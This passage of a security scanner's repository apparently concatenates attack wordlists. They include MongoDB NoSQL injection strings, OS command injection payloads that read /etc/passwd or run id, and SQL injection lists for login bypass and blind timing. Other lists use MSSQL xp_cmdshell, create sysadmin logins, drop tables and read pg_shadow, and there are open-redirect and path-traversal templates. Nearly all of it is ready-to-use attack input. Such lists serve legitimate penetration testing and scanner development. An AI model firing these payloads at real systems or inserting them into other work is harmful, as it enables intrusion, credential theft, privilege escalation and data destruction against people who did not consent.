| /var/log/apache/error_log 26 | /var/log/apache2/error_log 27 | /var/log/apache/error.log 28 | /var/log/apache2/error.log 29 | /var/log/error_log 30 | /var/log/error.log 31 | -------------------------------------------------------------------------------- /wordlist/attack/no-sql-injection/mongodb.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/Commands-OSX.txt: -------------------------------------------------------------------------------- 1 | alias 2 | alloc 3 | apropos 4 | awk 5 | basename 6 | bash 7 | bg 8 | bind 9 | bless 10 | break 11 | builtin 12 | bzip 13 | cal 14 | caller 15 | case 16 | cat 17 | cd 18 | chflags 19 | chgrp 20 | chmod 21 | chown 22 | chroot 23 | cksum 24 | clear 25 | cmp 26 | comm 27 | command 28 | complete 29 | continue 30 | cp 31 | cron 32 | crontab 33 | curl 34 | cut 35 | date 36 | dc 37 | dd 38 | declare 39 | defaults 40 | df 41 | diff 42 | diff3 43 | dig 44 | dirname 45 | dirs 46 | diskutil 47 | disown 48 | ditto 49 | dot_clean 50 | drutil 51 | dscacheutil 52 | dscl 53 | du 54 | echo 55 | ed 56 | enable 57 | env 58 | eval 59 | exec 60 | exit 61 | expand 62 | expect 63 | export 64 | expr 65 | false 66 | fc 67 | fdisk 68 | fg 69 | file 70 | find 71 | fmt 72 | fold 73 | for 74 | fsck 75 | fsaclctl 76 | fs_usage 77 | ftp 78 | 
GetFileInfo 79 | getopt 80 | getopts 81 | goto 82 | grep 83 | groups 84 | gzip 85 | hash 86 | head 87 | hdiutil 88 | history 89 | hostname 90 | id 91 | if 92 | info 93 | install 94 | jobs 95 | join 96 | kextfind 97 | kickstart 98 | kill 99 | l 100 | last 101 | launchctl 102 | ll 103 | less 104 | let 105 | lipo 106 | ln 107 | local 108 | locate 109 | logname 110 | login 111 | logout 112 | lpr 113 | lprm 114 | lpstat 115 | ls 116 | lsregister 117 | lsbom 118 | lsof 119 | man 120 | mdfind 121 | mdutil 122 | mkdir 123 | mkfifo 124 | more 125 | mount 126 | mv 127 | net 128 | netstat 129 | networksetup 130 | nice 131 | nohup 132 | ntfs.util 133 | onintr 134 | open 135 | opensnoop 136 | osacompile 137 | osascript 138 | passwd 139 | paste 140 | pbcopy 141 | pbpaste 142 | pico 143 | ping 144 | pkgutil 145 | plutil 146 | pmset 147 | popd 148 | pr 149 | printenv 150 | printf 151 | ps 152 | pushd 153 | pwd 154 | quota 155 | rcp 156 | read 157 | readonly 158 | reboot 159 | return 160 | rev 161 | rm 162 | rmdir 163 | rpm 164 | rsync 165 | say 166 | screen 167 | screencapture 168 | sdiff 169 | security 170 | sed 171 | select 172 | set 173 | setfile 174 | shift 175 | shopt 176 | shutdown 177 | sips 178 | sleep 179 | softwareupdate 180 | sort 181 | source 182 | split 183 | stop 184 | su 185 | sudo 186 | sum 187 | suspend 188 | sw_vers 189 | system_profiler 190 | systemsetup 191 | tail 192 | tar 193 | tee 194 | test 195 | textutil 196 | time 197 | times 198 | top 199 | touch 200 | tr 201 | trap 202 | traceroute 203 | true 204 | tty 205 | type 206 | ufs.util 207 | ulimit 208 | umask 209 | umount 210 | unalias 211 | uname 212 | unexpand 213 | uniq 214 | units 215 | unset 216 | until 217 | users 218 | uuencode 219 | uudecode 220 | uuidgen 221 | uucp 222 | vi 223 | wait 224 | wc 225 | whatis 226 | where 227 | which 228 | while 229 | who 230 | whoami 231 | write 232 | xargs 233 | yes 234 | -------------------------------------------------------------------------------- 
/wordlist/attack/os-cmd-execution/Commands-Windows.txt: -------------------------------------------------------------------------------- 1 | a 2 | arp 3 | assoc 4 | at 5 | atmadm 6 | attrib 7 | bootcfg 8 | break 9 | cacls 10 | call 11 | change 12 | chcp 13 | chdir 14 | chkdsk 15 | chkntfs 16 | cipher 17 | cls 18 | cmd 19 | cmstp 20 | color 21 | comp 22 | compact 23 | convert 24 | copy 25 | cprofile 26 | cscript 27 | date 28 | defrag 29 | del 30 | dir 31 | diskcomp 32 | diskcopy 33 | diskpart 34 | doskey 35 | driverquery 36 | echo 37 | endlocal 38 | eventcreate 39 | eventquery 40 | eventtriggers 41 | evntcmd 42 | exit 43 | expand 44 | fc 45 | filter 46 | find 47 | findstr 48 | finger 49 | flattemp 50 | for 51 | format 52 | fsutil 53 | ftp 54 | ftype 55 | getmac 56 | goto 57 | gpresult 58 | gpupdate 59 | graftabl 60 | help 61 | helpctr 62 | hostname 63 | if 64 | ipconfig 65 | ipseccmd 66 | ipxroute 67 | irftp 68 | label 69 | lodctr 70 | logman 71 | lpq 72 | lpr 73 | macfile 74 | mkdir 75 | mmc 76 | mode 77 | more 78 | mountvol 79 | move 80 | msiexec 81 | msinfo32 82 | nbtstat 83 | net 84 | netsh 85 | netstat 86 | nslookup 87 | ntbackup 88 | ntcmdprompt 89 | ntsd 90 | openfiles 91 | pagefileconfig 92 | path 93 | pathping 94 | pause 95 | pbadmin 96 | pentnt 97 | perfmon 98 | ping 99 | popd 100 | print 101 | prncnfg 102 | prndrvr 103 | prnjobs 104 | prnmngr 105 | prnport 106 | prnqctl 107 | prompt 108 | pushd 109 | query 110 | rasdial 111 | rcp 112 | recover 113 | reg 114 | regsvr32 115 | relog 116 | rem 117 | rename 118 | replace 119 | rexec 120 | rmdir 121 | route 122 | rsh 123 | rsm 124 | runas 125 | sc 126 | schtasks 127 | secedit 128 | set 129 | setlocal 130 | shift 131 | shutdown 132 | sort 133 | start 134 | subst 135 | systeminfo 136 | sfc 137 | taskkill 138 | tasklist 139 | tcmsetup 140 | telnet 141 | tftp 142 | time 143 | title 144 | tracerpt 145 | tracert 146 | tree 147 | type 148 | typeperf 149 | unlodctr 150 | ver 151 | verify 152 | vol 153 | vssadmin 154 | 
w32tm 155 | winnt 156 | winnt32 157 | wmic 158 | xcopy 159 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/Commands-WindowsPowershell.txt: -------------------------------------------------------------------------------- 1 | get-acl 2 | set-acl 3 | get-alias 4 | import-alias 5 | new-alias 6 | set-alias 7 | get-authenticodesignature 8 | set-authenticodesignature 9 | set-location 10 | get-childitem 11 | get-command 12 | measure-command 13 | trace-command 14 | add-content 15 | get-content 16 | set-content 17 | clear-content 18 | convertto-html 19 | convertfrom-securestring 20 | convertto-securestring 21 | clear-host 22 | clear-item 23 | copy-item 24 | get-credential 25 | get-childitem 26 | get-date 27 | set-date 28 | remove-item 29 | do 30 | get-psdrive 31 | new-psdrive 32 | remove-psdrive 33 | get-eventlog 34 | get-executionpolicy 35 | set-executionpolicy 36 | export-alias 37 | export-clixml 38 | export-console 39 | export-csv 40 | invoke-expression 41 | exit 42 | foreach-object 43 | foreach 44 | for 45 | format-custom 46 | format-list 47 | format-table 48 | format-wide 49 | get-item 50 | get-childitem 51 | get-help 52 | add-history 53 | get-history 54 | invoke-history 55 | get-host 56 | clear-host 57 | read-host 58 | write-host 59 | if 60 | import-clixml 61 | import-csv 62 | get-item 63 | invoke-item 64 | new-item 65 | remove-item 66 | set-item 67 | clear-itemproperty 68 | copy-itemproperty 69 | get-itemproperty 70 | move-itemproperty 71 | new-itemproperty 72 | remove-itemproperty 73 | rename-itemproperty 74 | set-itemproperty 75 | stop-process 76 | get-location 77 | pop-location 78 | push-location 79 | set-location 80 | add-member 81 | get-member 82 | move-item 83 | compare-object 84 | group-object 85 | measure-object 86 | new-object 87 | select-object 88 | sort-object 89 | where-object 90 | out-default 91 | out-file 92 | out-host 93 | out-null 94 | out-printer 95 | out-string 96 | powershell 97 | 
convert-path 98 | join-path 99 | resolve-path 100 | split-path 101 | test-path 102 | get-pfxcertificate 103 | pop-location 104 | push-location 105 | get-process 106 | stop-process 107 | clear-itemproperty 108 | copy-itemproperty 109 | get-itemproperty 110 | move-itemproperty 111 | new-itemproperty 112 | remove-itemproperty 113 | rename-itemproperty 114 | set-itemproperty 115 | get-psprovider 116 | set-psdebug 117 | add-pssnapin 118 | get-pssnapin 119 | remove-pssnapin 120 | quest 121 | read-host 122 | remove-item 123 | rename-item 124 | rename-itemproperty 125 | run/call 126 | select-object 127 | get-service 128 | new-service 129 | restart-service 130 | resume-service 131 | set-service 132 | sort-object 133 | start-service 134 | stop-service 135 | suspend-service 136 | start-sleep 137 | switch 138 | select-string 139 | tee-object 140 | new-timespan 141 | trace-command 142 | get-tracesource 143 | set-tracesource 144 | start-transcript 145 | stop-transcript 146 | get-uiculture 147 | get-unique 148 | update-formatdata 149 | update-typedata 150 | clear-variable 151 | get-variable 152 | new-variable 153 | remove-variable 154 | set-variable 155 | where-object 156 | where 157 | while 158 | get-wmiobject 159 | write-debug 160 | write-error 161 | write-output 162 | write-progress 163 | write-verbose 164 | write-warning 165 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/OSCommandInject.Windows.txt: -------------------------------------------------------------------------------- 1 | +|+Dir+c:\ 2 | $+|+Dir+c:\ 3 | %26%26+|+dir c:\ 4 | $%26%26dir c:\ 5 | %0a+dir+c:\ 6 | +|+Dir+c:%255c 7 | $+|+Dir+c:%255c 8 | %26%26+|+dir c:%255c 9 | $%26%26dir+c:%255c 10 | %0a+dir+c:%255c 11 | +|+Dir+c:%2f 12 | $+|+Dir+c:%2f 13 | %26%26+|+dir c:%2f 14 | $%26%26dir+c:%2f 15 | %0a+dir+c:%2f 16 | +dir+c:\+| 17 | +|+dir+c:\+| 18 | +|+dir+c:%2f+| 19 | dir+c:\ 20 | ||+dir|c:\ 21 | 
-------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | /index.html|id| 4 | ;id; 5 | ;id 6 | ;netstat -a; 7 | ;id; 8 | |id 9 | |/usr/bin/id 10 | |id| 11 | |/usr/bin/id| 12 | ||/usr/bin/id| 13 | |id; 14 | ||/usr/bin/id; 15 | ;id| 16 | ;|/usr/bin/id| 17 | \n/bin/ls -al\n 18 | \n/usr/bin/id\n 19 | \nid\n 20 | \n/usr/bin/id; 21 | \nid; 22 | \n/usr/bin/id| 23 | \nid| 24 | ;/usr/bin/id\n 25 | ;id\n 26 | |usr/bin/id\n 27 | |nid\n 28 | `id` 29 | `/usr/bin/id` 30 | a);id 31 | a;id 32 | a);id; 33 | a;id; 34 | a);id| 35 | a;id| 36 | a)|id 37 | a|id 38 | a)|id; 39 | a|id 40 | |/bin/ls -al 41 | a);/usr/bin/id 42 | a;/usr/bin/id 43 | a);/usr/bin/id; 44 | a;/usr/bin/id; 45 | a);/usr/bin/id| 46 | a;/usr/bin/id| 47 | a)|/usr/bin/id 48 | a|/usr/bin/id 49 | a)|/usr/bin/id; 50 | a|/usr/bin/id 51 | ;system('cat%20/etc/passwd') 52 | ;system('id') 53 | ;system('/usr/bin/id') 54 | %0Acat%20/etc/passwd 55 | %0A/usr/bin/id 56 | %0Aid 57 | %0A/usr/bin/id%0A 58 | %0Aid%0A 59 | & ping -i 30 127.0.0.1 & 60 | & ping -n 30 127.0.0.1 & 61 | %0a ping -i 30 127.0.0.1 %0a 62 | `ping 127.0.0.1` 63 | | id 64 | & id 65 | ; id 66 | %0a id %0a 67 | `id` 68 | $;/usr/bin/id 69 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/command-injection-template.txt: -------------------------------------------------------------------------------- 1 | {cmd} 2 | ;{cmd} 3 | ;{cmd}; 4 | ^{cmd} 5 | |{cmd} 6 | <{cmd} 7 | <{cmd}; 8 | <{cmd}\n 9 | <{cmd}%0D 10 | <{cmd}%0A 11 | &{cmd} 12 | &{cmd}& 13 | &&{cmd} 14 | &&{cmd}&& 15 | %0D{cmd} 16 | %0D{cmd}%0D 17 | %0A{cmd} 18 | %0A{cmd}%0A 19 | \n{cmd} 20 | \n{cmd}\n 21 | '{cmd}' 22 | `{cmd}` 23 | ;{cmd}| 24 | ;{cmd}/n 25 | |{cmd}; 26 | a);{cmd} 27 | a;{cmd} 28 | a);{cmd} 29 | a;{cmd}; 30 | a);{cmd}| 31 | FAIL||{cmd} 32 | 
CMD=$'{cmd}';$CMD 33 | ;CMD=$'{cmd}';$CMD 34 | ^CMD=$'{cmd}';$CMD 35 | |CMD=$'{cmd}';$CMD 36 | &CMD=$'{cmd}';$CMD 37 | &&CMD=$'{cmd}';$CMD 38 | %0DCMD=$'{cmd}';$CMD 39 | FAIL||CMD=$'{cmd}';$CMD 40 | CMD=$\'{cmd}\';$CMD 41 | ;CMD=$\'{cmd}\';$CMD 42 | ^CMD=$\'{cmd}\';$CMD 43 | |CMD=$\'{cmd}\';$CMD 44 | &CMD=$\'{cmd}\';$CMD 45 | &&CMD=$\'{cmd}\';$CMD 46 | %0DCMD=$\'{cmd}\';$CMD 47 | FAIL||CMD=$\'{cmd}\';$CMD 48 | CMD=$"{cmd}";$CMD 49 | ;CMD=$"{cmd}";$CMD 50 | ^CMD=$"{cmd}";$CMD 51 | |CMD=$"{cmd}";$CMD 52 | &CMD=$"{cmd}";$CMD 53 | &&CMD=$"{cmd}";$CMD 54 | %0DCMD=$"{cmd}";$CMD 55 | FAIL||CMD=$"{cmd}";$CMD 56 | 57 | ;system('{cmd}') 58 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/shell-delimiters.txt: -------------------------------------------------------------------------------- 1 | ; 2 | ^ 3 | & 4 | && 5 | | 6 | || 7 | %0D 8 | %0A 9 | \n 10 | < 11 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/shell-operators.txt: -------------------------------------------------------------------------------- 1 | < 2 | > 3 | << 4 | >> 5 | <> 6 | >| 7 | | 8 | || 9 | & 10 | && 11 | $ 12 | ; 13 | &> 14 | &>> 15 | <<< 16 | >>> 17 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt: -------------------------------------------------------------------------------- 1 | ..%255c 2 | .%5c../..%5c 3 | /..%c0%9v../ 4 | /..%c0%af../ 5 | /..%255c..%255c 6 | 7 | -------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/useful-commands-unix.txt: -------------------------------------------------------------------------------- 1 | uname -n -s 2 | whoami 3 | pwd 4 | last 5 | cat /etc/passwd 6 | ls -la /tmp 7 | ls -la /home 8 | ping -i 30 127.0.0.1 9 | ping 127.0.0.1 10 | ping -n 30 11 | 
-------------------------------------------------------------------------------- /wordlist/attack/os-cmd-execution/useful-commands-windows.txt: -------------------------------------------------------------------------------- 1 | ver 2 | chdir 3 | echo %USERNAME% 4 | -------------------------------------------------------------------------------- /wordlist/attack/os-dir-indexing/directory-indexing.txt: -------------------------------------------------------------------------------- 1 | ;dir 2 | `dir` 3 | |dir| 4 | |dir 5 | /%3f.jsp 6 | ?M=D 7 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 8 | -------------------------------------------------------------------------------- /wordlist/attack/path-traversal/path-traversal-windows.txt: -------------------------------------------------------------------------------- 1 | C:/inetpub/wwwroot/global.asa 2 | C:\inetpub\wwwroot\global.asa 3 | C:/boot.ini 4 | C:\boot.ini 5 | D:\inetpub\wwwroot\global.asa 6 | D:/inetpub/wwwroot/global.asa 7 | -------------------------------------------------------------------------------- /wordlist/attack/redirect/redirect-injection-template.txt: -------------------------------------------------------------------------------- 1 | {target} 2 | /{target} 3 | //{target} 4 | ///{target} 5 | ////{target} 6 | /\{target} 7 | %2f{target} 8 | %2f$2f{target} 9 | %2f{target}%2f%2f 10 | $2f%2f{target}%2f%2f 11 | %2f{target}// 12 | -------------------------------------------------------------------------------- /wordlist/attack/redirect/redirect-urls-template.txt: -------------------------------------------------------------------------------- 1 | ?url=http://{target} 2 | ?url=https://{target} 3 | ?next=http://{target} 4 | ?next=https://{target} 5 | ?url=http://{target} 6 | ?url=https://{target} 7 | ?url=http://{target} 8 | 
?url=//{target} 9 | ?url=$2f%2f{target} 10 | ?next=//{target} 11 | ?next=$2f%2f{target} 12 | ?url=//{target} 13 | ?url=$2f%2f{target} 14 | ?url=//{target} 15 | /redirect/{target} 16 | /cgi-bin/redirect.cgi?{target} 17 | /out/{target} 18 | /out?{target} 19 | /out?/{target} 20 | /out?//{target} 21 | /out?/\{target} 22 | /out?///{target} 23 | ?view={target} 24 | ?view=/{target} 25 | ?view=//{target} 26 | ?view=/\{target} 27 | ?view=///{target} 28 | /login?to={target} 29 | /login?to=/{target} 30 | /login?to=//{target} 31 | /login?to=/\{target} 32 | /login?to=///{target} 33 | -------------------------------------------------------------------------------- /wordlist/attack/server-side-include/server-side-includes-generic.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 |
63 |
64 | 66 |
67 | 68 |
69 | 70 | 71 | 72 | 73 | 74 | 75 |
 
76 |
77 |
78 |
79 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/GenericBlind.txt: -------------------------------------------------------------------------------- 1 | sleep(__TIME__)# 2 | 1 or sleep(__TIME__)# 3 | " or sleep(__TIME__)# 4 | ' or sleep(__TIME__)# 5 | " or sleep(__TIME__)=" 6 | ' or sleep(__TIME__)=' 7 | 1) or sleep(__TIME__)# 8 | ") or sleep(__TIME__)=" 9 | ') or sleep(__TIME__)=' 10 | 1)) or sleep(__TIME__)# 11 | ")) or sleep(__TIME__)=" 12 | ')) or sleep(__TIME__)=' 13 | ;waitfor delay '0:0:__TIME__'-- 14 | );waitfor delay '0:0:__TIME__'-- 15 | ';waitfor delay '0:0:__TIME__'-- 16 | ";waitfor delay '0:0:__TIME__'-- 17 | ');waitfor delay '0:0:__TIME__'-- 18 | ");waitfor delay '0:0:__TIME__'-- 19 | ));waitfor delay '0:0:__TIME__'-- 20 | '));waitfor delay '0:0:__TIME__'-- 21 | "));waitfor delay '0:0:__TIME__'-- 22 | benchmark(10000000,MD5(1))# 23 | 1 or benchmark(10000000,MD5(1))# 24 | " or benchmark(10000000,MD5(1))# 25 | ' or benchmark(10000000,MD5(1))# 26 | 1) or benchmark(10000000,MD5(1))# 27 | ") or benchmark(10000000,MD5(1))# 28 | ') or benchmark(10000000,MD5(1))# 29 | 1)) or benchmark(10000000,MD5(1))# 30 | ")) or benchmark(10000000,MD5(1))# 31 | ')) or benchmark(10000000,MD5(1))# 32 | pg_sleep(__TIME__)-- 33 | 1 or pg_sleep(__TIME__)-- 34 | " or pg_sleep(__TIME__)-- 35 | ' or pg_sleep(__TIME__)-- 36 | 1) or pg_sleep(__TIME__)-- 37 | ") or pg_sleep(__TIME__)-- 38 | ') or pg_sleep(__TIME__)-- 39 | 1)) or pg_sleep(__TIME__)-- 40 | ")) or pg_sleep(__TIME__)-- 41 | ')) or pg_sleep(__TIME__)-- 42 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/Generic_SQLI.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MSSQL.txt: 
-------------------------------------------------------------------------------- 1 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 2 | 'create user name identified by 'pass123' -- 3 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 4 | ' ; drop table temp -- 5 | 'exec sp_addlogin 'name' , 'password' -- 6 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 7 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 8 | ' grant connect to name; grant resource to name; -- 9 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 10 | ' or 1=1 -- 11 | ' union (select @@version) -- 12 | ' union (select NULL, (select @@version)) -- 13 | ' union (select NULL, NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 17 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MSSQL_blind.txt: -------------------------------------------------------------------------------- 1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- 2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- 3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- 4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- 5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- 6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 9 | 
-------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MySQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | 1or1=1 8 | 1'or'1'='1 9 | fake@ema'or'il.nl'='il.nl 10 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/detect/MySQL_MSSQL.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1 and user_name() = 'dbo' 3 | \'; desc users; -- 4 | 1\'1 5 | 1' and non_existant_table = '1 6 | ' or username is not NULL or username = ' 7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 9 | 1 uni/**/on select all from where 10 | 11 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/db2-enumeration.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/ms-sql-enumeration.txt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/sql-injection/exploit/ms-sql-enumeration.txt -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/mysql-injection-login-bypass.txt: -------------------------------------------------------------------------------- 1 | ' OR 1=1-- 2 | 'OR '' = ' Allows authentication without a valid username. 3 | '-- 4 | ' union select 1, '', '' 1-- 5 | 'OR 1=1-- 6 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/mysql-read-local-files.txt: -------------------------------------------------------------------------------- 1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 2 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/exploit/postgres-enumeration.txt: -------------------------------------------------------------------------------- 1 | select version(); 2 | select current_database(); 3 | select current_user; 4 | select session_user; 5 | select current_setting('log_connections'); 6 | select current_setting('log_statement'); 7 | select current_setting('port'); 8 | select current_setting('password_encryption'); 9 | select current_setting('krb_server_keyfile'); 10 | select current_setting('virtual_host'); 11 | select current_setting('port'); 12 | select current_setting('config_file'); 13 | select current_setting('hba_file'); 14 | select current_setting('data_directory'); 15 | select * from pg_shadow; 16 | select * from pg_group; 17 | create table myfile (input TEXT); 18 | copy myfile from '/etc/passwd'; 19 | select * from myfile;copy myfile to /tmp/test; 20 | -------------------------------------------------------------------------------- 
/wordlist/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-ORDER_BY.txt: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | 
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /wordlist/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 
